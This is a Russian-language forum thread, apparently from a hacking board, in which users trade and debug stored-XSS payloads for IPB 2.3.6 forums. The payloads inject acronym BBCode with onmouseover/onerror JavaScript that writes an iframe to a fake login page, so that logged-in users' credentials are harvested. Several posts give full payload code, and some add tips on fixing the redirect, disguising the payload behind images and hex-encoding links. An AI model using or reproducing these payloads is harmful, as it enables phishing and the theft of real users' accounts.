Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация

Взлом БД через форум с xss

-

Базы серверов и брут

- Все, что связано с брутом и работой с базами данных

Закрытая тема
 
Опции темы
Старый 09.07.2010, 10:37   #106
Заблокирован
 Пехотинец
Аватар для necros555
 
necros555 скоро будет известенnecros555 скоро будет известенnecros555 скоро будет известен
Регистрация: 09.12.2009
Сообщений: 60
Популярность: 234
Сказал(а) спасибо: 25
Поблагодарили 112 раз(а) в 59 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от ВосстаниеПосмотреть сообщение
Здравствуйте.
Решил попробовать сделать XSS
Фейк сделал и залил чтоб работал без проблем, а влт сжедать чтоб выскакивали на форуме не могу.
Подскажите пожалуйста что я неправильно делаю, вот код:

x3Cifr*ame естественно без *

Неработает никак, часа 4 промучился на форуме [Ссылки могут видеть только зарегистрированные пользователи. ]

то что это для ipb а не для булки вот че ты неправильно делаеш
 
Пользователь сказал cпасибо:
Alexander6107 (30.07.2010)
Старый 10.07.2010, 02:51   #107
 Старший сержант
Аватар для wagan
 
wagan душа компанииwagan душа компанииwagan душа компанииwagan душа компанииwagan душа компанииwagan душа компанииwagan душа компанииwagan душа компании
Регистрация: 22.04.2009
Сообщений: 183
Популярность: 952
Сказал(а) спасибо: 57
Поблагодарили 133 раз(а) в 46 сообщениях
Отправить сообщение для wagan с помощью ICQ
 
По умолчанию

А если в подписи остается код, значит не работает? Ибо акроним там разрешен это знаю.

оО ну не знаю тут и с видимым кодом переадресует [Ссылки могут видеть только зарегистрированные пользователи. ] (переадресовывало и до того как я добавил еще два варианта кода ниже)

Последний раз редактировалось ATJIaHTuK; 10.07.2010 в 09:55.
 
Старый 10.07.2010, 02:54   #108
Заблокирован
 Капитан
Аватар для BlackWinG
 
BlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауру
Регистрация: 08.04.2010
Сообщений: 279
Популярность: 654
Сказал(а) спасибо: 126
Поблагодарили 277 раз(а) в 113 сообщениях
Отправить сообщение для BlackWinG с помощью ICQ Отправить сообщение для BlackWinG с помощью Skype™
 
По умолчанию

Цитата:
Сообщение от waganПосмотреть сообщение
А если в подписи остается код, значит не работает? Ибо акроним там разрешен это знаю.

оО ну не знаю тут и с видимым кодом переадресует [Ссылки могут видеть только зарегистрированные пользователи. ] (переадресовывало и до того как я добавил еще два варианта кода ниже)



Да, если в подписи ты видиш свой код, значит там точно не получиться....

Сказано ведь, забудь, там работать не будет просто, только палишся...

Последний раз редактировалось ATJIaHTuK; 10.07.2010 в 09:56.
 
Старый 10.07.2010, 09:00   #109
 Сержант
Аватар для IncubusX
 
IncubusX излучает ауруIncubusX излучает ауруIncubusX излучает ауруIncubusX излучает ауруIncubusX излучает ауруIncubusX излучает ауру
Регистрация: 04.03.2010
Сообщений: 117
Популярность: 604
Сказал(а) спасибо: 213
Поблагодарили 111 раз(а) в 47 сообщениях
Отправить сообщение для IncubusX с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Его сообщении в мазиле переадресовывает только при наведении.
 
Старый 10.07.2010, 14:26   #110
 Разведчик
Аватар для Восстание
 
Восстание вызывает надежду
Регистрация: 06.07.2010
Сообщений: 8
Популярность: -13
Сказал(а) спасибо: 2
Поблагодарили 3 раз(а) в 3 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Переадресовывает но валиво. Закрась это в белый цвет)

По моему на "булках" тоже как то можно так делать, только я непомню код, но он там простой.
 
Старый 10.07.2010, 17:18   #111
 Старший сержант
Аватар для wagan
 
wagan душа компанииwagan душа компанииwagan душа компанииwagan душа компанииwagan душа компанииwagan душа компанииwagan душа компанииwagan душа компании
Регистрация: 22.04.2009
Сообщений: 183
Популярность: 952
Сказал(а) спасибо: 57
Поблагодарили 133 раз(а) в 46 сообщениях
Отправить сообщение для wagan с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Код:
[acronym=test1[acronym=test2 onmouseover=document.write("\x3C******\x20src=http://fake.net/2/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E");document.close(); ]_]Мышку не наводить, выбьет с форума))[/acronym]_[/acronym]
Все норм, переходит на фейк, ввожу валидный акк и пишет что акк не правильный, мол попробуйте еще раз. Чего не хватает? Ибо я думаю он должен логиниться и переходить на их форум.
 
Старый 10.07.2010, 17:50   #112
Заблокирован
 Пехотинец
Аватар для fesssi
 
fesssi скоро будет известенfesssi скоро будет известенfesssi скоро будет известенfesssi скоро будет известенfesssi скоро будет известен
Регистрация: 14.11.2009
Сообщений: 64
Популярность: 425
Сказал(а) спасибо: 35
Поблагодарили 134 раз(а) в 56 сообщениях
Отправить сообщение для fesssi с помощью ICQ Отправить сообщение для fesssi с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

Возможно когда ты просматиривал сообщение в форуме когда тя перебрасывало ты был незалогинен на форуме.
Фишка работает когда ты залогинен на форуме и просматриваеш сообщение под своим профилем и тя перебросило на фейк. Тогда ты водиш пароль и логин и тя снова бросает на форум где ты уже до того залогинен.
Думаю проблема в этом.
 
Старый 10.07.2010, 18:07   #113
 Разведчик
Аватар для F4ll3nL0rD
 
F4ll3nL0rD на правильном пути
Регистрация: 05.12.2009
Сообщений: 46
Популярность: 80
Сказал(а) спасибо: 31
Поблагодарили 35 раз(а) в 19 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от waganПосмотреть сообщение
Код:
[acronym=test1[acronym=test2 onmouseover=document.write("\x3C******\x20src=http://fake.net/2/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E");document.close(); ]_]Мышку не наводить, выбьет с форума))[/acronym]_[/acronym]
Все норм, переходит на фейк, ввожу валидный акк и пишет что акк не правильный, мол попробуйте еще раз. Чего не хватает? Ибо я думаю он должен логиниться и переходить на их форум.

Ты в скрипте посмотри куда стоит редирект.
Если так:
[Ссылки могут видеть только зарегистрированные пользователи. ]

То поправь на
[Ссылки могут видеть только зарегистрированные пользователи. ]
И все должно получиться.
 
Старый 10.07.2010, 18:47   #114
 Старший сержант
Аватар для wagan
 
wagan душа компанииwagan душа компанииwagan душа компанииwagan душа компанииwagan душа компанииwagan душа компанииwagan душа компанииwagan душа компании
Регистрация: 22.04.2009
Сообщений: 183
Популярность: 952
Сказал(а) спасибо: 57
Поблагодарили 133 раз(а) в 46 сообщениях
Отправить сообщение для wagan с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от fesssiПосмотреть сообщение
Возможно когда ты просматиривал сообщение в форуме когда тя перебрасывало ты был незалогинен на форуме.
Фишка работает когда ты залогинен на форуме и просматриваеш сообщение под своим профилем и тя перебросило на фейк. Тогда ты водиш пароль и логин и тя снова бросает на форум где ты уже до того залогинен.
Думаю проблема в этом.

Был залогинен.

Цитата:
Сообщение от F4ll3nL0rDПосмотреть сообщение
Ты в скрипте посмотри куда стоит редирект.
Если так:
[Ссылки могут видеть только зарегистрированные пользователи. ]

То поправь на
[Ссылки могут видеть только зарегистрированные пользователи. ]
И все должно получиться.

Точно))

Последний раз редактировалось wagan; 10.07.2010 в 19:03. Причина: Добавлено сообщение
 
Старый 12.07.2010, 13:47   #115
 Разведчик
Аватар для Libert
 
Libert никому не известный тип
Регистрация: 17.05.2009
Сообщений: 4
Популярность: 12
Сказал(а) спасибо: 2
Поблагодарили 1 раз в 1 сообщении
 
По умолчанию Re: Взлом БД через форум с xss

Ребят, вот что вылетает вместо переадресации
Цитата:
<****** src=http://адресфейка/ frameborder=0 width=100% height=100% scrolling=no>

IPB 2.3.6 тег работает, фейк работает, с переадресацией ****ь какая-то=(

Кстати на IPB 3 не пашет, пробывал на трех форумах

Добавлено через 6 минут
ах да, вот сам текст:
Цитата:
[acronym=test1[acronym=test2 onmouseover= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime( )+30*24*60*60*1000);document.cookie=\x22ipb_my=123 4;\x20expires=\x22+valid_until.toGMTString();docum ent.write(\x22\x3C******\x20src=http://адресфейка/\x20frameborder=0\x20width=100%\x20height=100%\x20 scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]Здесь могла быть ваша реклама[/acronym]_[/acronym]

Потом пробывал и это:
Цитата:
[acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime( )+30*24*60*60*1000);document.cookie=\x22ipb_my=123 4;\x20expires=\x22+valid_until.toGMTString();docum ent.write(\x22\x3C******\x20src=http://адресфейка/\x20frameborder=0\x20width=100%\x20height=100%\x20 scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]

После каждой попытки чистил куки и всё-равно не переадресовывает
IE 8 не сработал
Opera 10.60
Цитата:
<****** src=http://адресфейка/ frameborder=0 width=100% height=100% scrolling=no>

Firefox 4.01 и 3.6 то-же что и с оперой, если кто сталкивался, обьясните что не так

Добавлено через 7 часов 4 минуты
сорри, не посмотрел первое сообщение до конца, заменил звёздочки-пашет, автору плюс огромный, если кто сможет подкинуть код для булки(vbulletin) буду оч благодарен.
Хочу добавить, что лучше всего вместо текста ставить картинку вроде [img*]http://img143.imageshack.us/img143/3750/dig.gif[/img*] (без звёздочек)
После лучше шифрануть ссылки в 16-тиричный вид можно в вебе на ха.кер.орг а можно самому [Ссылки могут видеть только зарегистрированные пользователи. ] тут есть исходник html для такого энкодера

Последний раз редактировалось Libert; 12.07.2010 в 20:52. Причина: Добавлено сообщение
 
Закрытая тема

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом сервера через PHP Silence Треп 1 27.09.2010 20:41
Кража аккаунтов через форум (скрипт php) Razzor Подполье Lineage 2 (0 уровень) 1 01.08.2009 00:21

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 09:04.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net